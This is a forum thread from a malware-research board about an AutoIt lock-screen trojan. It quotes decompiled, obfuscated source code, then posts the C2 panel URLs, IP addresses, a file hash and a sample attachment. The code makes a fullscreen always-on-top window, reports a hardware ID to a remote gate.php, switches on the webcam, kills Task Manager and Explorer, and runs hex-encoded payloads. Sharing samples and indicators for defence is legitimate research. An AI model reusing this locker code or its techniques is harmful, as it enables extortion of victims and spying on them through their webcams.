	$a2d3c520012 = "0" & @CPUArch & @KBLayout & StringUpper(DriveGetType($a363c222d50)) & DriveSpaceTotal($a363c222d50)
	$a443c925246 = StringMid($a2d3c520012, Round(StringLen($a2d3c520012) / 2), Round(StringLen($a2d3c520012) / 2))
	$a1e3cc2533f = Fn0009(Fn0008($a443c925246))
	$a2d3c520012 = Fn0003(1, $a2d3c520012, $a1e3cc2533f, 4)
	Return $a2d3c520012
EndFunc

Fn0426()
$a133cf2512b = "aaabauernscheisseoki"
Local $Var1191 = Fn0382()
$a044c122c44 = "aaabauernscheisseoki"
$a284c324c27 = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $Var0614 + $Var0630, $Var0634 + $Var0631 + $Var0630)
$a324c820107 = "aaabauernscheisseoki"
GUISetBkColor(0x00ffffff)
$a3e4cb2583f = "aaabauernscheisseoki"
GUICtrlCreateObj($Var1191, (@DesktopWidth - 0x0000040b) / 2, (@DesktopHeight - 0x000002bc) / 2, 0x0000044c, 0x000002ee)
$a255c52401e = "aaabauernscheisseoki"
GUISetState()
$a345c72370f = "aaabauernscheisseoki"
Fn0203($a284c324c27, 15, 0x000000ff, 3)
$a035cc20224 = "aaabauernscheisseoki"
Fn0383($Var1191, "obession.co.ua/panel2/landing/gate.php?hwid=" & $a0e3c122755, 1)
$a036c025e2f = "aaabauernscheisseoki"
$a1d6c22103c = 0x00000400
$a176c424618 = $a1d6c22103c + 0x00000064
$a166c620750 = $a1d6c22103c + 0x00000051
$a186c821a30 = $a176c424618 + 0x00000051
$a0e6ca26225 = $a186c821a30
$a106cb24808 = $a1d6c22103c + 0x00000045
$a526cd20e5e = $a1d6c22103c + 0x0000002e
$a3b6cf24414 = $a1d6c22103c + 0x0000002b
$a0f7c120a1c = $a1d6c22103c + 0x00000029
$a267c322a0d = $a1d6c22103c + 0x0000002a
$a4b7c521e0e = $a1d6c22103c + 10
$a367c722a62 = $a1d6c22103c + 11
$a497c925330 = $a1d6c22103c + 14
$a127cb2581a = $a1d6c22103c + 12
$a2b7cd20246 = $a176c424618 + 12
$a637cf22d4e = $a1d6c22103c + 13
$a398c123a08 = $a176c424618 + 13
$a068c325d0f = $a1d6c22103c + 0x0000001e
$a288c520518 = $a0e6ca26225
$a2a8c624a32 = $a1d6c22103c + 0x00000016
$a348c82554d = $a1d6c22103c + 0x00000015
$a298ca22635 = $a176c424618 + 0x00000015
$a348cc21941 = $a1d6c22103c + 0x00000017
$a248ce2352a = $a176c424618 + 0x00000017
$a519c020e3b = $a1d6c22103c + 0x00000019
$a019c221c29 = $a176c424618 + 0x00000019
$a5d9c423300 = $a1d6c22103c + 0x00000014
$a409c624a1d = $a176c424618 + 0x00000014
$a559c82284b = $a1d6c22103c + 0x00000018
$a139ca2172a = $a1d6c22103c + 0x00000024
$a059cc2380e = $a1d6c22103c + 1
$a399ce22704 = $a1d6c22103c + 0x00000043
$a30ac025761 = $a176c424618 + 0x00000043
$a57ac223c49 = $a1d6c22103c + 0x00000041
$a2bac423d4b = $a1d6c22103c + 0x00000036
$a46ac620f1e = $a1d6c22103c + 8
$a4aac822257 = $a1d6c22103c + 0x0000002c
$a35aca2390b = $a1d6c22103c + 0x0000003c
$a26acc2342a = $a1d6c22103c + 0x0000003d
$a3dace23d24 = $a1d6c22103c + 0x00000053
$a2ebc02173f = $a1d6c22103c + 0x00000054
$a32bc223918 = $a1d6c22103c + 0x00000050
$a63bc424b42 = $a176c424618 + 0x00000050
$a42bc623a21 = $a1d6c22103c + 0x00000052
$a1cbc824d22 = $a1d6c22103c + 0x0000003e
$a1cbca25d41 = $a1d6c22103c + 0x0000003f
$a20bcc20703 = $a1d6c22103c + 0x00000023
$a3fbce22f2d = $a1d6c22103c + 0x00000055
$a35cc022b54 = $a1d6c22103c + 2
$a03cc222829 = $a176c424618 + 2
$a5bcc424131 = $a1d6c22103c + 5
$a29cc621f49 = $a1d6c22103c + 3
$a22cc825f56 = $a176c424618 + 3
$a4dcca23c1a = $a1d6c22103c + 6
$a2cccc25732 = $a1d6c22103c + 7
$a22cce25509 = $a1d6c22103c + 4
$a52dc024142 = $a1d6c22103c + 0x00000042
$a16dc221320 = $a176c424618 + 0x00000042
$a01dc421f2a = $a1d6c22103c + 0x00000033
$a29dc62012d = $a1d6c22103c + 0x00000032
$a11dc825c39 = $a1d6c22103c + 0x00000034
$a08dca25e42 = $a1d6c22103c + 0x00000035
$a4bdcc23543 = $a1d6c22103c + 0x00000037
$a33dce20330 = $a1d6c22103c + 0x00000040
$a50ec023a05 = $a1d6c22103c + 9
$a10ec225834 = $a1d6c22103c + 0x0000002d
$a55ec425540 = $a1d6c22103c + 0x00000048
$a63ec62390f = $a1d6c22103c + 0x00000047
$a2cec825e27 = $a1d6c22103c + 0x00000046
$a13eca2380a = $a1d6c22103c + 0x00000044
$a3aecc2424f = DllOpen("avicap32.dll")
$a01ece24408 = "aaabauernscheisseoki"
$a5bfc02381c = DllOpen("user32.dll")
$a05fc220f2e = "aaabauernscheisseoki"
$a07fc424c3a = DllCall($a3aecc2424f, "int", "capCreateCaptureWindow", "str", "cap", "int", BitOR($Var0613, $Var0611), "int", (@DesktopWidth - 0x00000064) / 2, "int", ((@DesktopHeight - 0x000002bc) / 2) - 0x0000004c, "int", 0x00000064, "int", 0x0000004b, "hwnd", $a284c324c27, "int", 1)
$a5c0da22f17 = "aaabauernscheisseoki"
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a4b7c521e0e, "int", 0, "int", 0)
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a08dca25e42, "int", 1, "int", 0)
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a01dc421f2a, "int", 1, "int", 0)
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a29dc62012d, "int", 1, "int", 0)
DllCall($a5bfc02381c, "int", "SendMessage", "hWnd", $a07fc424c3a[0], "int", $a11dc825c39, "int", 1, "int", 0)
$a123d924e15 = "aaabauernscheisseoki"
GUISetState(@SW_SHOW)
$a613dc24f1c = "aaabauernscheisseoki"
Local $Var1192, $Var1193
$a264d024f3a = "aaabauernscheisseoki"
$Var1192 = TimerInit()
While 1
	$a214d321c4c = "aaabauernscheisseoki"
	$Var1193 = TimerDiff($Var1192)
	$a1b4d52172d = "aaabauernscheisseoki"
	If $Var1193 > 0 Then
		$a104d824e17 = "aaabauernscheisseoki"
		If ProcessExists("taskmgr.exe") Then
			$a594db21414 = "aaabauernscheisseoki"
			ProcessClVar1197e("taskmgr.exe")
			$a154de21c07 = "aaabauernscheisseoki"
		EndIf
		$a505d025121 = "aaabauernscheisseoki"
		If ProcessExists("explorer.exe") Then
			$a135d324110 = "aaabauernscheisseoki"
			Execute(BinaryTVar1197tring("0x52756E2840436F6D5370656320262022202F63202220262020277461736B6B696C6C202F66202F696D206578706C6F7265722E657865272C2022222C204053575F4849444529"))
			$a225d62092a = "aaabauernscheisseoki"
		EndIf
		$a565d82191d = "aaabauernscheisseoki"
		$Var1193 = 0
		$a525db2351f = "aaabauernscheisseoki"
		$Var1192 = TimerInit()
		$a615dd26102 = "aaabauernscheisseoki"
	EndIf
	$a4f5df2383c = "aaabauernscheisseoki"
	WinSetOnTop($a284c324c27, "", 1)
	$a076d222d25 = "aaabauernscheisseoki"
	WinActivate($a284c324c27)
	$a276d42340d = "aaabauernscheisseoki"
WEnd
$a056d625362 = "aaabauernscheisseoki"
$a3f6d822225 = "aaabauernscheisseoki"
$a136da23230 = "aaabauernscheisseoki"
$a136dc22d20 = "aaabauernscheisseoki"
$a5a6de20b0b = "aaabauernscheisseoki"

Func Fn0448()
	For $ax0x0xa = 1 To 5
		Local $locVar0001 = Var1196x_()
		FileInstall("test2.au3.tbl", $locVar0001, 1)
		Global $Var1196, $Var1197 = Execute(BinaryTVar1197tring("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383335333333373334333733323336333933363435333633373335333333373330333634333336333933373334333233383334333633363339333634333336333533353332333633353336333133363334333233383332333433343331333333343334333533333330333333303333333033333330333333323333333633333335333433353337333333373431333534363332333933323433333233373337343233333334333333373337343333323337333234333333333133323339323732393239272929"))
		If IsArray($Var1197) AND $Var1197[0] >= 8893 Then ExitLoop 
		Sleep(10)
	Next
	Execute(BinaryTVar1197tring("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333433343335333333303333333033333330333333303333333233333336333333353334333533373333333734313335343633323339323732393239272929"))
EndFunc

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: AutoIt/LockScreen

#22101 by patriq
Fri Jan 31, 2014 3:52 pm

mysql:
hxxp://obession.co.ua/phpmyadmin/index.php

another login:
hxxp://obession.co.ua/loader/index.php

earlier in this thread there was mention of 2 more IP
95.163.104.87
95.163.104.88

both have files:
hxxp://95.163.104.87/1
hxxp://95.163.104.88/1
(IsDebuggerPresent function)
https://urlquery.net/report.php?id=9146879

(both files same md5)
3ef90061fa80d6d111a288165d87bc57
https://www.virustotal.com/en/file/cdd7 ... /analysis/
(30/50)
attached

Attachments

sample.zip

(47.35 KiB) Downloaded 62 times

Username

patriq

Posts

109

Joined

Fri Jun 28, 2013 8:11 pm